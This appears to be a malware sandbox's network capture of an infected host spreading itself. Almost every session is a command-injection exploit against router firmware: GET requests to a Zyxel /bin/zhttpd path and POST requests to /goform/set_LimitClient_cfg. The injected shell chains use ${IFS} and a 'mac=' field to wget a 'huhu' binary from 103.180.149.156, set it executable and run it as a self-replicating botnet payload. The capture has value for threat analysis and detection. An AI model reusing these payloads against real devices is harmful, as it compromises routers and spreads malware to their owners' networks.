                                                        Feb 2, 2024 06:21:14.007745981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5534192.168.2.1449972157.51.34.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007793903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5535192.168.2.145129096.121.22.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007839918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5536192.168.2.1439654210.118.27.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007900000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5537192.168.2.144070225.114.140.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007924080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5538192.168.2.144660024.107.168.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.007971048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5539192.168.2.1459784209.186.190.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008021116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5540192.168.2.145792899.175.90.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008073092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5541192.168.2.1439026112.93.13.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008101940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5542192.168.2.1437400171.65.76.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008157969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5543192.168.2.144118225.54.38.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008183956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5544192.168.2.144518050.161.156.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008219957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5545192.168.2.144036835.68.142.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008245945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5546192.168.2.1441378183.241.90.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008294106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5547192.168.2.144044869.190.112.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008322954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5548192.168.2.145431053.106.223.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008343935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5549192.168.2.1453630158.203.89.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008374929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5550192.168.2.1445174151.61.95.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.008431911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5551192.168.2.145120837.187.96.358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.278301954 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:14.493896008 CET601INHTTP/1.1 400 Bad Request
                                                        Date: Fri, 02 Feb 2024 05:21:14 GMT
                                                        Server: Apache/2.4.25 (Debian)
                                                        Strict-Transport-Security: max-age=15768000
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5552192.168.2.1442478104.25.236.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.606565952 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:14.724945068 CET328INHTTP/1.1 400 Bad Request
                                                        Server: cloudflare
                                                        Date: Fri, 02 Feb 2024 05:21:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        CF-RAY: -
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5553192.168.2.144465039.136.132.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.842040062 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:15.194933891 CET313INHTTP/1.1 400 Bad Request
                                                        Server: ZXCACHE
                                                        Date: Fri, 02 Feb 2024 05:21:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5554192.168.2.1458254109.66.226.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018307924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5555192.168.2.1460844143.48.242.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018418074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5556192.168.2.1454292142.102.29.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018481970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5557192.168.2.144753279.162.22.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018537045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5558192.168.2.143594671.185.103.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018560886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5559192.168.2.1443914109.188.204.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018613100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5560192.168.2.145180483.58.56.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018647909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5561192.168.2.145504254.103.53.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018682003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5562192.168.2.1459446155.128.114.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018728018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5563192.168.2.143451446.119.30.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018775940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5564192.168.2.1460284158.220.174.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018815041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5565192.168.2.145066492.56.195.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018868923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5566192.168.2.1438482103.1.234.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018913984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5567192.168.2.1457876216.2.151.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.018965960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5568192.168.2.143525235.56.110.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019026041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5569192.168.2.1448402138.23.125.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019047976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5570192.168.2.1450806141.12.198.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019077063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5571192.168.2.1438526176.118.147.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019117117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5572192.168.2.1437716167.29.1.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019159079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5573192.168.2.145143698.146.205.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019198895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5574192.168.2.1446898204.154.110.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019229889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5575192.168.2.1451112218.22.240.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019300938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5576192.168.2.1435726140.197.152.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019341946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5577192.168.2.1434484122.215.207.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019373894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5578192.168.2.1439620134.85.237.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019404888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5579192.168.2.14400685.95.53.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019457102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5580192.168.2.1453856142.188.193.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.019484043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
